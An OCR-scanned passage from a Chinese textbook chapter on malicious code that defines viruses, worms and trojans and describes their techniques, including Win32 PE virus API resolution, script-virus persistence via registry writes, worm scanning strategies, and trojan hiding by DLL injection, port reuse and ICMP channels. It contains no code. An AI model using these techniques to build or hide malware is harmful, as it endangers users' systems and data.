一 般 都 具有 自我 复制 的 功能 ,同时 还 可 以 把 自己 的 副本 分 发 到 其 他 文件 、 程 序 或 计算 机 
中 去 。 病 毒 一 般 寄宿 在 主机 的 程序 中 , 当 被 感染 文件 执行 操作 的 时 候 , 病 毒 就 会 自我 复制 。 
由 于 设计 者 的 目的 不 同 ,病毒 也 拥有 不 同 的 功能 ,一 些 病毒 只 是 用 于 恶作剧 ,而 另 一 些 则 是 
以 破坏 为 目的 ,还 有 一 些 病毒 表面 上 看 是 恶作剧 病毒 ,但 实际 上 隐 含 破坏 功能 。 

2. 蠕虫 

最 早 的 蠕虫 开始 于 1982 年 ,当时 John F. Shoch 等 人 为 了 进行 分 布 式 计 算 的 模拟 实验 ， 
编写 了 称 为 “蠕虫 ”的 程序 ,这 种 程序 可 以 “从 一 台 计算 机 移动 到 另 一 台 计 算 机 ”。 但 他 们 万 


万 没有 想到 ,这 种 “蠕虫 "程序 在 后 来 不 断 给 计算 机 带 来 灾难 。1988 年 Robert Morris 释放 
的 第 一 个 蠕虫 恶意 代码 ,在 几 小 时 内 迅速 感染 了 当时 Internet 上 存在 漏洞 的 计算 机 ,造成 了 
巨大 的 破坏 。 后 来 的 CodeRed、CodeRedI1 “冲击波 ”等 造成 的 破坏 更 大 。 

许多 人 经 常 将 蠕虫 称 为 蠕虫 病毒 。 但 严格 地 讲 ,蠕虫 并 不 是 传统 意义 上 的 病毒 。 蠕 虫 
与 传统 病毒 相 比 ,具有 明显 的 特点 ,如 表 16. 3 所 示 。 


表 16.3 蠕虫 与 传统 病毒 的 区 别 


传统 病毒 蠕 ”中 
存在 的 独立 性 病毒 具有 寄生 性 ,病毒 是 嵌入 在 ”蠕虫 是 作为 独立 程序 个 体 存在 的 。 由 于 蠕虫 
被 感染 文件 中 ,一 般 不 能 独立 ”是 独立 程序 个 体 , 所 以 它 可 以 作为 病毒 的 寄 
存在 生体 ,携带 病毒 ,并 在 发 作 时 释放 病毒 
传播 的 主动 性 病毒 的 传播 需要 计算 机 使 用 者 ”蠕虫 自动 搜索 联网 计算 机 的 漏洞 并 传染 , 完 


的 触发 。 比 如 运行 受 感染 的 程 ”全 可 以 不 需要 人 的 操作 
序 , 打 开 受 感染 的 文档 等 

感染 和 破坏 的 对 象 ” 病毒 主要 是 感染 计算 机 中 的 文 ” 蠕 虫 则 是 感染 计算 机 系统 ,并 造成 计算 机 性 
件 和 文件 系统 ,并 造成 文件 丢失 ”能 降低 、 网 络 速度 降 低 
和 损坏 

传播 速度 由 于 传播 需要 计算 机 使 用 者 的 
触发 ,传播 速度 较 慢 


由 于 传播 的 主动 性 ,传播 速度 很 快 


1988 年 Morris 蠕虫 爆发 后 ,Eugene. H. SPafford 为 了 区 分 蠕虫 和 病毒 ,给 出 了 蠕虫 技 
术 角 度 的 定义 :“ 计 算 机 蠕虫 可 以 独立 运行 ,并 能 把 自身 的 包含 所 有 功能 的 版 本 移动 到 另 一 
台 计算 机 ”。 从 该 定义 可 以 得 出 蠕虫 的 3 个 基本 特征 : 一 是 可 以 独立 运行 ,不 依附 于 其 他 程 
序 个 体 ; 二 是 可 以 从 一 台 计 算 机 移动 到 另 一 台 计算 机 ; 三 是 可 以 自我 复制 。 

3. 木马 

木马 的 全 称 叫 特洛伊 木马 (Trojan Horse) ,来 源 于 古 希 腊 神话 。 传 说 古 希 腊 王 在 攻打 
特洛伊 城 的 时 候 , 久 攻 不 下 ,于 是 想 出 了 一 个 妙计 : 在 巨大 的 木马 内 装 满 了 士兵 ,然后 假装 
撤退 ,把 木马 留 下 ; 特洛伊 人 把 木马 当做 战利品 拉 回 城内 ; 到 了 晚上 ,木马 内 的 希腊 士兵 悄 
悄 钻 了 出 来 ,打开 城 门 : 希腊 王 因此 顺利 地 攻 下 了 特洛伊 城 。 此 后 ,人 们 就 把 特洛伊 木马 作 
为 伪装 的 内 部 颠覆 者 的 代名词 。 

计算 机 网 络 中 的 木马 是 指 隐藏 在 计算 机 中 的 具有 特殊 功能 的 程序 。 它 实际 上 是 一 种 远 
程控 制 软件 ,但 它 与 一 般 的 远程 控制 软件 不 同 : 木马 是 未 经 用 户 授权 ,通过 网 络 攻 击 或 欺骗 
手段 安装 到 目标 计算 机 中 的 ,而 一 般 的 远程 控制 软件 是 计算 机 用 户 有 意 安装 的 。 

木马 的 定义 : 特洛伊 木马 是 一 种 程序 , 它 表面 上 提供 一 些 有 用 或 者 令 人 感 兴趣 的 功能 ， 
但 是 在 这 表面 的 内 部 还 有 用 户 不 知道 的 其 他 功能 .例如 在 用 户 不 知道 的 情况 下 拷贝 文件 或 
窃取 密码 。 简 单 地 说 ,凡是 能 在 本 地 计算 机 操作 的 功能 ,木马 基本 上 都 能 实现 。 

木马 恶意 代码 一 般 由 两 部 分 组 成 : 一 个 是 服务 器 程序 (Server) , 另 一 个 是 客户 端 远 程 
控制 程序 (Client) 。 木 马 采用 欺骗 或 者 漏洞 攻击 等 手段 把 服务 器 程序 安装 到 受害 者 的 计算 
机 中 ,这 就 是 所 谓 的 计算 机 “中 了 木马 ”。 客 户 端 是 用 来 控制 目标 主机 (受害 者 计算 机 ) 的 部 
分 ,安装 在 控制 者 的 计算 机 中 , 它 的 作用 是 用 来 连接 木马 的 服务 器 端 ,并 发 送 控制 命令 和 接 
收 返回 信息 ,从 而 达到 监视 和 控制 目标 主机 的 作用 。 木 马 的 控制 者 通过 木马 的 客户 端 给 服 


计算 机 痪 素 、 和 恶意 代码 及 防范 


山 避 


基于 案例 的 网 络 安 会 鞭 术 与 实践 


务 器 端 发 送 一 系列 指令 ,控制 者 能 任意 访问 被 控制 端的 计算 机 ,在 受害 者 计算 机 上 做 任何 想 
做 的 事情 。 木 马 不 仅 具有 像 病毒 .蠕虫 一 样 的 危害 ,比如 删除 和 修改 文件 .格式 化 硬盘 、 攻 击 
其 他 计算 机 等 ; 木马 另 一 个 主要 危害 还 在 于 它 能 够 窃取 受害 者 的 敏感 信息 ,比如 截取 受害 
者 计算 机 的 屏幕 信息 ,收集 受害 者 的 所 有 键盘 裔 击 信息 、 获 取 密 码 等 。 因 此 ,木马 是 一 种 最 
危险 的 恶意 代码 。 

从 前 面 的 叙述 ,我们 知道 病毒 .蠕虫 .木马 之 间 是 有 显著 区 别 的 。 通 过 对 它们 之 间 的 区 
别 , 不 同 特点 的 分 析 比 较 , 可 以 更 好 地 了 解 其 传播 方式 ,可 以 有 针对 性 地 制定 出 检测 和 控制 
方法 ,更 好 地 防御 各 类 恶意 代码 的 传播 ,其 区 别 如 表 16. 4 所 示 。 


表 16.4 病毒 .蠕虫 木马 的 主要 区 别 


病 毒 蠕 ” 虫 木 马 
存在 形式 ”寄生 独立 个 体 独立 个 体 
传播 途径 ”通过 宿主 程序 运行 ”通过 系统 存在 漏洞 植 人 目标 主机 
传播 速度 慢 快 最 慢 
攻击 目标 ”本 地 文件 计算 机 系统 ; 网 络 资源 ”本 地 文件 、 系 统 ; 网 络 节点 ; 窃取 信息 
触发 ”计算 机 操作 者 程序 自身 计算 机 操作 者 
防治 方法 “从 宿主 文件 中 摘除 ”为 系统 打 补 丁 停止 并 删除 计算 机 木马 服务 器 程序 
对 抗 主体 ”计算 机 使 用 者 和 反 计算 机 使 用 者 、 系 统 软件 ”计算 机 使 用 者 、 反 病毒 供应 商 、 网 络 管 
病毒 供应 商 供应 商 、 网 络 管理 者 理 者 


另 一 方面 , 随 着 恶意 代码 技术 的 发 展 , 传 统计 算 机 病毒 .蠕虫 .木马 之 间 的 界线 已 不 那么 
明显 。 一 个 恶意 代码 程序 可 以 具有 双重 或 多 重 特征 , 即 既是 蠕虫 又 是 木马 或 既是 病毒 又 是 
木马 或 同时 是 病毒 .蠕虫 .木马 等 。 比 如 ,CodeRed 工 就 是 一 个 蠕虫 木马 双 特 型 恶意 代码 ， 
它 首 先 采 用 蠕虫 技术 利用 微软 IIS 的 漏洞 感染 目标 计算 机 ,然后 把 一 个 木马 程序 下 载 并 植 
和 到 目标 计算 机 中 。 多 种 恶意 代码 技术 相互 结合 是 恶意 代码 发 展 的 趋势 ,这 类 恶意 代码 往 
往 具 有 更 大 的 破坏 性 ,防范 难度 也 更 大 。 此 时 ,单一 的 恶意 代码 防范 方式 很 难 奏效 ,必须 综 
合 采 用 各 种 防御 技术 。 

4. 移动 代码 

移动 代码 是 能 够 从 主机 传输 到 客户 端 计算 机 上 并 执行 的 代码 , 它 通常 是 作为 病毒 .蠕虫 
或 是 木马 的 一 部 分 被 传送 到 客户 计算 机 上 的 。 另 外 ,移动 代码 可 以 利用 系统 的 漏洞 进行 人 
侵 , 例 如 非法 的 数据 访问 和 盗 取 root 账号 。 通 常用 于 编写 移动 代码 的 工具 有 Java applets、 
ActiveX Java Script 和 VB Script 等 。 

5. 复合 型 病毒 

恶意 代码 通过 多 种 方式 传播 就 形成 了 复合 型 病毒 ,著名 的 尼 姆 达 (Nimda) 蠕 虫 实际 上 
就 是 复合 型 病毒 的 一 个 例子 , 它 通 过 E-mail、 网 络 共 享 、Web 服务 器 和 Web 终端 4 种 方式 
进行 传播 。 除 此 之 外 ,复合 型 病毒 还 可 通过 其 他 的 一 些 服 务 来 传播 ,例如 直接 传送 信息 和 点 
对 点 的 文件 共享 。 


16.3.3 网 络 和 恶意 代码 的 关键 技术 


1. 计算 机 病毒 的 关键 技术 
下 面 以 Win32PE 病毒 和 脚本 病毒 为 例 , 讲 解 病毒 的 关键 技术 。 


1) Win32PE 病毒 

Win32PE 病毒 就 是 专门 以 Win32PE 格式 可 执行 文件 为 感染 对 象 的 病毒 。Win32PE 
文件 是 指 Win32 (Windows 95/98/2000/XP) 环境 下 的 PE 格式 (Portable Executable 
Format) 的 可 执行 文件 。Win32PE 病毒 在 感染 目标 文件 的 过 程 中 ,要 实现 以 下 关键 技术 和 
功能 。 

(1) 重 定位 。 

重 定位 是 指 程序 在 运行 中 确定 数据 在 内 存 中 的 存储 位 置 。 对 正常 程序 来 说 ,在 编译 程 
序 时 就 已 经 确定 了 数据 在 内 存 中 的 位 置 , 程 序 装 和 人 运行 后 不 需要 对 数据 进行 重新 定位 。 但 
病毒 在 感染 宿主 程序 时 ,不 同 的 宿主 程序 病毒 其 插入 的 位 置 也 不 同 , 那 么 病毒 随 着 宿主 程 
序 加 载 到 内 存 后 ,病毒 需要 用 到 的 数据 的 位 置 也 就 无 法 确定 ,病毒 也 就 无 法 执行 。 因 此 , 病 
毒 必须 对 自己 的 数据 进行 重 定位 。 

(2) 获取 API 函数 地 址 。 

在 Win32 环境 中 ,系统 功能 调用 不 是 通过 中 断 实现 ,而 是 通过 调用 Windows API 函数 
实现 。 因 此 ,必须 首先 获取 API 函数 的 入 口 地 址 。 但 是 ,Win32PE 病毒 与 普通 的 Win32PE 
程序 不 同 ,普通 的 Win32PE 程序 里 有 一 个 引入 函数 节 , 程 序 通 过 这 个 节 可 以 找到 自己 所 用 
到 的 每 个 API 函数 在 动态 链接 库 中 的 地 址 ,从 而 调用 相应 的 函数 。 但 是 Win32PE 病毒 本 
身 并 没有 引入 函数 节 , 因 此 不 能 像 普通 程序 那样 找到 API 函数 的 地 址 。 病 毒 如 何 找到 API 
函数 地 址 是 一 个 重要 技术 。 下 面 是 病毒 常 采 用 的 一 个 方法 。 

第 一 步 : 首先 获得 Kernel32. dll 的 基地 址 。 当 系统 在 执行 一 个 Win32PE 程序 前 ,会 j 
用 Kernel32. dll 中 的 CreateProcess 函数 装载 该 Win32PE 程序 ,CreateProcess 装载 完成 
后 , 先 将 一 个 返回 地 址 压 人 堆栈 ,然后 转向 该 Win32PE 程序 运行 。 假 设 该 Win32PE 程序 是 
带 病毒 的 程序 ,病毒 先 通过 弹出 堆栈 取得 该 返回 地 址 ,然后 从 返回 地 址 向 下 搜索 即 可 在 附近 
找到 Kernel32. dll 的 基地 址 。 搜 索 条 件 是 PE 头 不 能 大 于 4096 字 节 ,PE header 的 
ImageBase 值 应 该 和 当前 指针 相等 。 

第 二 步 : 获得 Kenrel32. dll 的 基地 址 后 ,再 在 export 表 中 搜索 找到 GetModuleHandle、 
LoadLibraryA、GetProcAddress 函数 的 地 址 ,然后 就 能 得 到 任何 想 调用 的 函数 地 址 了 。 

(3) 搜索 目标 文件 。 

可 以 通过 调用 API 函数 FindFirstFile 和 FindNextFile 搜索 。 

(4) 内 存 文 件 映射 。 

使 用 内 存 文件 映射 进行 文件 读 写 。 

(5) 感染 其 他 文件 。 

(6) 返回 宿主 程序 。 

2) 脚本 病毒 

脚本 病毒 是 一 些 嵌 入 在 应 用 程序 .数据 文档 和 操作 系统 中 的 用 脚本 语言 编写 的 具有 恶 
意 目的 的 一 组 命令 。 在 Windows 平台 (Windows 2000/XP) ,脚本 语言 由 WSH (Windows 
Script Host, 即 Windows 脚本 宿主 ) 来 解释 执行 ,WSH 是 可 支持 多 种 语言 的 脚本 语言 工作 
环境 。 在 运行 脚本 文件 时 , WSH 会 根据 脚本 语言 自动 启用 相应 的 脚本 引擎 (微软 自 带 
VBScript 和 Jscript 引擎 ,第 三 方 也 可 开发 自己 的 脚本 引擎 ) 执 行 脚 本 命令 。 

WSH 构架 于 ActievX 技术 之 上 ,WSH 预定 义 了 一 些 对 象 ,同时 可 以 使 用 COM 的 其 他 
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对 象 。 脚 本 通过 Java 脚本 引擎 \VB 脚本 引擎 解释 执行 ,并 借助 WSH 核心 对 象 模型 ,脚本 
获得 了 对 Windows 桌面 文件 系统 .注册 表 、 网 络 驱动 器 等 的 访问 能 力 。 这 也 使 脚本 病毒 能 
轻易 获得 系统 控制 权 ,并 肆意 传播 和 破坏 。 

脚本 病毒 的 感染 机 制 : 脚本 病毒 直接 通过 自我 复制 感染 文件 ,把 病毒 的 代码 直接 附加 
在 目标 文件 中 间 。 比 如 光 爱 虫 ? 病 毒 首先 生成 目标 文件 的 一 个 副本 ,把 病毒 代码 谋 和 人 其 中 ， 
同时 用 原文 件 名 作为 病毒 文件 名 前 级 ,以 . vbs 作为 后 级 组 成 病毒 文件 名 ,并 删除 原文 件 。 
“新 欢乐 时 光 ” 病 毒 将 自己 的 代码 附加 在 目标 . htm 文件 的 尾部 ,并 在 顶部 加 入 一 条 调用 病毒 
代码 的 语句 。 

脚本 病毒 的 传播 手段 ; 

(1) 通过 电子 邮件 传播 。 主 要 是 利用 outlook 对 象 传播 。 

(2) 通过 网 络 共 享 传播 。 

(3) 通过 网 页 传播 。 

(4) 通过 IRC 聊天 通道 传播 。 

脚本 病毒 获得 控制 权 的 方法 : 

(1) 修改 注册 表 。 调 用 Wscript. Shell 的 RegWrite 方法 修改 注册 表 , 使 系统 每 次 启动 
时 都 会 自动 运行 病毒 程序 。 

(2) 修改 文件 执行 方式 。 例 如 “新 欢乐 时 光 ” 病 毒 将 扩展 名 为 dll 的 文件 的 执行 方式 修 
改 为 wscript. exe。 

(3) 引诱 用 户 执 行 。 病 毒 往往 采用 诱惑 性 的 文件 名 促使 用 户主 动 点 击 ; 而 且 采 用 双 后 
组 文件 名 (如 xxx. jpg. vbs) ,由 于 Windows 在 默认 情况 下 不 显示 后 级 ,用 户 误 以 为 是 正常 文 
件 而 点 击 。 

(4) desktop. ini 和 folder. htt 的 配合 使 用 。desktop. ini 和 folder. htt 可 用 于 配置 活动 
桌面 。 如 果 一 个 目录 中 有 这 两 个 文件 ,默认 情况 下 用 户 进 入 这 个 目录 就 会 执行 folder. htt。 
如 果 在 folder. htt 中 有 病毒 代码 ,病毒 就 会 获得 控制 权 。 

脚本 病毒 的 弱点 : 

(1) 脚本 病毒 的 复制 一 般 要 用 到 FileSystemObject 对 象 。 

(2) 病毒 的 邮件 传播 要 用 到 outlook 的 自动 发 送 功能 。 

(3) 病毒 代码 要 通过 Windows Script Host 解释 执行 。 

(4) 病毒 通过 网 页 传播 需要 ActiveX 的 支持 。 这 些 弱 点 可 以 用 于 脚本 病毒 的 防治 。 比 
如 ,在 Windows 目录 中 删除 wscript. exe 和 cscript. exe 文件 或 改名 。 又 比如 在 IE 的 
“Internet 选项 中 ,把 *Active 控件 及 插件 ?设置 为 禁用 。 

2. 蠕虫 关键 技术 

1) 蠕虫 工作 机 制 

网 络 蠕虫 的 攻击 行为 可 以 分 为 4 个 阶段 : 信息 收集 .扫描 探测 .攻击 渗透 和 自我 推进 。 
信息 收集 主要 完成 对 本 地 和 目标 节点 主机 的 信息 汇集 ; 扫描 探测 主要 完成 对 具体 目标 主机 
服务 漏洞 的 检测 ; 攻击 渗透 利用 已 发 现 的 服务 漏洞 实施 攻击 ; 自我 推进 完成 对 目标 节点 的 
感染 。 

2) 蠕虫 的 扫描 策略 

蠕虫 利用 系统 漏洞 进行 传播 首先 要 进行 主机 探测 。ICMP Ping 包 和 TCP SYN FIN、 


RST 及 ACK 包 均 可 用 来 进行 探测 。 良 好 的 扫描 策略 能 够 加 速 蠕虫 传播 ,理想 化 的 扫描 策 
略 能 够 使 蠕虫 在 最 短 时 间 内 找到 互联 网 上 全 部 可 以 感染 的 主机 。 按 照 蠕虫 对 目标 地 址 空间 
的 选择 方式 进行 分 类 ,扫描 策略 包括 选择 性 随机 扫描 、 顺 序 扫 描 、 基 于 目标 列表 的 扫描 、 分 治 
扫描 、 基 于 路 由 的 扫描 、 基 于 DNS 扫描 等 。 

(1) 选择 性 随机 扫描 (selective random scan)。 

随机 扫描 会 对 整个 地 址 空间 的 IP 随机 抽取 进行 扫描 ,而 选择 性 随机 扫描 将 最 有 可 能 存 
在 漏洞 主机 的 地 址 集 作为 扫描 的 地 址 空间 ,也 是 随机 扫描 策略 的 一 种 。 所 选 的 目标 地 址 按 
照 一 定 的 算法 随机 生成 ,互联 网 地 址 空间 中 未 分 配 的 或 者 保留 的 地 址 块 不 在 扫描 之 列 。 选 
择 性 随机 扫描 具有 算法 简单 、 易 实现 的 特点 , 若 与 本 地 优先 原则 结合 , 则 能 达到 更 好 的 传播 效 
果 。 但 选择 性 随机 扫描 容易 引起 网 络 阻塞 ,使 得 网 络 蠕虫 在 爆发 之 前 易 被 发 现 ,隐蔽 性 差 。 

(2) 顺序 扫描 (sequential scan)。 

顺序 扫描 是 指 被 感染 主机 上 蠕虫 会 随机 选择 一 个 C 类 网 络 地 址 进行 传播 。 根 据 本 地 
优先 原则 ,蠕虫 一 般 会 选择 它 所 在 网 络 内 的 IP 地 址 。 若 蠕虫 扫描 的 目标 地 址 IP 为 A, 则 扫 
描 的 下 一 个 地 址 IP 为 A 十 1 或 者 A 一 1。 一 旦 扫描 到 具有 很 多 漏洞 主机 的 网 络 时 就 会 达到 
很 好 的 传播 效果 。 该 策略 的 不 足 是 对 同一 台 主 机 可 能 重复 扫描 ,引起 网 络 拥塞 。 
W32. Blaster 是 典型 的 顺序 扫描 蠕虫 。 

(3) 基于 目标 列表 的 扫描 (hit-list scan)。 

基于 目标 列表 的 扫描 是 指 网 络 蠕虫 在 寻找 受 感染 的 目标 之 前 预先 生成 一 份 易 传染 的 目 
标 列表 ,然后 对 该 列表 进行 攻击 尝试 和 传播 。 目 标 列表 生成 方法 有 两 种 : 

QO 通过 小 规模 的 扫描 或 者 互联 网 的 共享 信息 产生 目标 列表 。 

@ 通过 分 布 式 扫描 可 以 生成 全 面 的 列表 的 数据 库 。 理 想 化 蠕虫 Flash 就 是 一 种 基于 
IPv4 地 址 空间 列表 的 快速 扫描 蠕虫。 

(4) 基于 路 由 的 扫描 (routable scan)。 

基于 路 由 的 扫描 是 指 网 络 蠕虫 根据 网 络 中 的 路 由 信息 ,对 IP 地 址 空间 进行 选择 性 扫描 
的 一 种 方法 。 采 用 随机 扫描 的 网 络 蠕虫 会 对 未 分 配 的 地 址 空间 进行 探测 ,而 这 些 地 址 大 部 
分 在 互联 网 上 是 无 法 路 由 的 ,因此 会 影响 到 蠕虫 的 传播 速度 。 如 果 网 络 蠕虫 能 够 知道 哪些 
IP 地 址 是 可 路 由 的 , 它 就 能 够 更 快 . 更 有 效 地 进行 传播 ,并 能 逃避 一 些 对 抗 工具 的 检测 。 

(5) 基于 DNS 扫描 (DNS scan) 。 

基于 DNS 扫描 是 指 网 络 蠕虫 从 DNS 服务 器 获取 IP 地 址 来 建立 目标 地 址 库 。 该 扫描 
策略 的 优点 在 于 ,所 获得 的 IP 地 址 块 具 有 针对 性 和 可 用 性 强 的 特点 。 

基于 DNS 扫描 的 不 足 是 : 

Q@ 难以 得 到 有 DNS 记录 的 地 址 完整 列表 。 

@ 蠕虫 代码 需要 携带 非常 大 的 地 址 库 ,传播 速度 慢 。 

@ 目标 地 址 列表 中 地 址 数 受 公共 域名 主机 的 限制 。 例 如 CodeRedI 所 感染 的 主机 中 几 
平一 半 没有 DNS 记录 。 

(6) 分 治 扫 描 (divide-conquer scan) 。 

分 治 扫 描 是 网 络 蠕虫 之 间 相 互 协作 ,快速 搜索 易 感 染 主机 的 一 种 策略 。 网 络 蠕 虫 发 送 
地 址 库 的 一 部 分 给 每 台 被 感染 的 主机 .然后 每 台 主 机 再 去 扫描 它 所 获得 的 地 址 。 主 机 A 感 
染 了 主机 B 以 后 ,主机 A 将 它 自身 携带 的 地 址 分 出 一 部 分 给 主机 B, 然 后 主机 B 开始 扫描 
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这 一 部 分 地 址 。 

分 治 扫描 策略 的 不 足 是 存在 * 坏 点 ”问题 。 在 蠕虫 传播 的 过 程 中 ,如 果 一 台 主 机 死机 或 
崩溃 ,那么 所 有 传 给 它 的 地 址 库 就 会 丢失 。 这 个 问题 发 生得 越 早 ,影响 就 越 大 。 有 3 种 方法 
能 够 解决 这 个 问题 : 

O 在 蠕虫 传递 地 址 库 之 前 产生 目标 列表 。 

@ 通过 计数 器 来 控制 蠕虫 的 传播 情况 ,蠕虫 每 感染 一 个 节点 ,计数 器 加 1, 然 后 根据 计 
数 器 的 值 来 分 配 任务 。 

@ 蠕虫 传播 的 时 候 随 机 决定 是 否 重 传 数据 库 。 

(7) 被 动 式 扫描 (passive scan) 。 

被 动 式 传播 蠕虫 不 需要 主动 扫描 就 能 够 传播 。 它 们 等 待 潜在 的 攻击 对 象 来 主动 接触 它 
们 ,或 者 依赖 用 户 的 活动 去 发 现 新 的 攻击 目标 。 由 于 它们 需要 用 户 触 发 ,所 以 传播 速度 很 
慢 , 但 这 类 蠕虫 在 发 现 目标 的 过 程 中 并 不 会 引起 通信 异常 ,这 使 得 它们 自身 有 更 强 的 安全 
性 。Contagion 是 一 个 被 动 式 蠕虫 , 它 通过 正常 的 通信 来 发 现 新 的 攻击 对 象 。CRClean 等 
待 Code Red II 的 探测 活动 , 当 它 探测 到 一 个 感染 企图 时 ,就 发 起 一 个 反攻 来 回应 该 感染 企 
图 ,如 果 反 攻 成 功 , 它 就 删除 Code Red II, 并 将 自己 安装 到 相应 机 器 上 。 

3. 木马 的 隐藏 技术 

由 于 木马 主要 采用 在 受害 机 器 安装 服务 器 程序 的 手段 进行 破坏 ,因此 木马 的 隐藏 方法 
是 其 能 够 生存 的 关键 技术 。 通 常 木 马 有 以 下 几 种 隐藏 手段 。 

1) 在 任务 栏 里 隐藏 

这 是 最 基本 的 隐藏 方式 。 要 实现 在 任务 栏 中 隐藏 的 目的 ,在 编程 时 很 容易 实现 。 以 
VB 为 例 , 只 要 把 form 的 Visible 属性 值 设 为 False,ShowInTaskBar 设 为 False, 程 序 就 不 
会 出 现在 任务 栏 里 了 。 

2) 隐藏 监听 端口 

一 台 计 算 机 有 65 536 个 端口 ,大 多 数 木马 使 用 1024 以 上 的 端口 。 因 为 1024 以 下 的 端 
口 大 多 保留 为 系统 其 他 正常 服务 使 用 ,占用 这 些 端口 可 能 造成 系统 不 正常 工作 ,容易 暴露 。 
为 了 进一步 隐藏 监听 端口 的 目的 ,现在 已 经 有 一 种 方法 可 以 实现 端口 的 复 用 , 即 一 个 端口 在 
用 于 正常 服务 功能 的 同时 ,又 用 于 木马 通信 。 采 用 这 种 技术 的 木马 故意 把 自己 的 端口 设置 
为 常用 正常 服务 的 端口 (如 135、445、80 等 ) ,达到 更 好 的 隐蔽 效果 。 

3) 在 任务 管理 列表 里 隐藏 

用 户 常常 通过 按 下 Ctrl 十 Alt 十 Del 来 查看 系统 正在 运行 的 任务 列表 ,很 容易 就 能 发 现 
木马 进程 并 删除 。 为 了 达到 在 任务 管理 列表 中 隐藏 的 目的 ,在 Windows 98 中 ,木马 把 自己 
设 为 “系统 服务 ”就 实现 了 在 任务 管理 列表 的 隐藏 ; 在 Windows 2000、Windows XP 等 系统 
中 ,木马 制作 者 采用 了 一 种 更 好 的 隐藏 方式 : 把 木马 写成 动态 连接 库 文件 (DLL 文件 ) ,运行 
时 将 自己 插入 另 一 个 进程 中 (一 般 是 系统 常用 进程 ,如 Explorer.， exe) ,这 样 木马 就 是 以 线程 而 
不 是 以 进程 方式 存在 。 在 打开 任务 管理 器 进行 查看 时 ,只 能 看 到 木马 隐藏 的 正常 进程 ,从 而 达 
到 了 木马 隐藏 的 目的 。 另 外 , 当 查 看 当前 使 用 的 端口 时 ,木马 打开 的 端口 显示 的 是 对 应 进程 
打开 的 端口 , 即 用 户 误 以 为 是 一 个 正常 进程 打开 的 端口 ,从 而 也 实现 了 端口 隐藏 的 目的 。 

4) 隐藏 通信 

隐藏 通信 也 是 木马 经 常 采 用 的 手段 之 一 。 一 般 木 马 运行 后 都 要 和 攻击 者 进行 通信 : 一 


种 是 直接 通信 ,如 攻击 者 通过 客户 端 直接 与 被 植 人 木马 的 主机 连接 通信 ; 另 一 种 是 间接 通 
信 , 如 通过 电子 邮件 的 方式 ,木马 将 目标 主机 的 敏感 信息 传 给 攻击 者 。 目 前 大 部 分 木马 都 是 
采用 TCP 连接 方式 使 攻击 者 直接 控制 受害 主机 的 ,这 些 木马 在 植 人 目标 主机 后 一 般 会 在 
1024 以 上 不 易 发 现 的 高 端 端 口上 监听 。 也 有 一 些 木马 采用 端口 复 用 技术 ,不 打开 新 的 通信 
端口 ,而 是 选择 一 些 正常 服务 的 端口 ,比如 80 端口 ,实现 通信 ,在 收 到 正常 的 HTTP 请 求 时 
把 它 交 给 Web 服务 器 处 理 , 只 有 在 收 到 一 些 特别 约定 的 数据 包 后 , 才 交 给 木马 处 理 。 另 外 ， 
现在 有 些 木 马 采用 ICMP 协议 传输 ,通过 ICMP 数据 包 传递 进行 远程 控制 ,这 样 除非 分 析 数 
据 包 里 面 的 内 容 ,否则 很 难 发 现 木 马 通信 。 

5) 隐藏 启动 方式 

木马 启动 的 方式 多 种 多 样 ,但 都 是 为 了 达到 同一 个 目的 : 使 木马 的 服务 器 端 程序 在 目 
标 主 机 每 次 开机 后 自动 运行 。 木 马 常 用 的 启动 方式 有 : 加 在 木马 程序 到 启动 组 ; 将 程序 添 
加 到 注册 表 的 运行 键 ,主要 有 Run、RunOnce、RunService、RunOnceService 等 ; 修改 BoLini 
实现 启动 ; 通过 修改 注册 表 中 的 输入 法 键 值 直 接 挂 接 启动 ; 修改 Explorer 启动 参数 和 在 
Win. ini、system. ini 中 的 load 节 添 加 启动 项 实现 启动 ; 在 Autoexec. bat 中 添加 程序 项 实现 
启动 ; 采用 文件 关联 实现 木马 的 启动 (比如 : 冰河 木马 ); 利用 DLL 木马 替换 系统 原 有 的 动 
态 连接 库 , 使 系统 在 装载 这 些 动 态 连 接 库 时 启动 木马 ; 还 可 以 采用 与 其 他 可 执行 文件 捆绑 ， 
在 运行 捆绑 文件 时 启动 木马 。 随 着 木马 技术 的 发 展 ,木马 还 会 采用 更 多 、 更 隐蔽 的 启动 方 
式 , 以 便 更 好 实现 隐藏 木马 的 目的 。 

6) 隐藏 传播 方式 

与 病毒 和 蠕虫 等 恶意 代码 不 同 ,木马 一 般 没有 主动 传播 的 功能 。 所 以 ,如 何 将 木马 成 功 
隐蔽 植 人 目标 主机 是 木马 传播 并 运行 的 关键 。 目 前 大 多 数 木 马 采 用 的 传播 途径 是 电子 邮 
件 , 但 随 着 用 户 对 木马 的 认识 不 断 提 高 ,这 种 方法 再 难以 奏效 。 随 着 网 络 应 用 的 不 断 发 展 ， 
木马 传播 的 途径 越 来 越 多 。 特 别 是 JavaScript、VBscript、ActiveX 等 技术 的 广泛 使 用 ,木马 
利用 这 些 技术 的 漏洞 进行 传播 变 得 越 来 越 容易 ,并 且 正 成 为 木马 传播 的 主流 。 比 如 通过 邮 
件 内 容 内 骨 WSH 脚本 ,用 户 无 须 打 开 附 件 ,仅仅 浏览 邮件 内 容 ,附件 中 的 木马 就 会 被 执行 。 
目前 ,邮件 木马 已 经 从 附件 走向 了 正文 ,简单 的 浏览 也 会 导致 木马 植 入 。 

7) 最 新 隐藏 技术 

通过 修改 虚拟 设备 驱动 程序 (VXD) 或 修改 动态 连接 库 (DLL) 来 加 载 木 马 。 这 种 方式 
基本 上 摆脱 了 原 有 的 木马 模式 (监听 端口 ), 而 是 采用 替代 系统 功能 的 方法 (改写 XVD、DLL 
等 )。 木 马 将 修改 后 的 DLL 文件 蔡 换 原 来 的 DLL 文件 ,并 对 所 有 的 函数 调用 进行 过 滤 。 对 
于 常用 的 函数 调用 ,使 用 函数 转发 器 直接 转发 给 原来 的 系统 函数 处 理 , 对 于 一 些 事先 约定 好 
的 特征 情况 ,会 交 给 木马 处 理 。 这 种 木马 没有 增加 新 的 文件 ,不 需要 打开 新 的 监听 端口 , 没 
有 新 的 进程 ,使 用 常规 的 方法 很 难 检测 到 它 。 在 一 般 情 况 下 ,木马 几乎 没有 任何 踪迹 ,只 有 
在 木马 的 控制 端 向 目标 主机 发 出 特定 的 信息 后 ,隐藏 的 木马 程序 才 开 始 运行 。 


16.3.4 网 络 悉 意 代码 的 防范 方法 


1. 蠕虫 防范 方法 
1) 企业 类 蠕虫 病毒 的 防范 
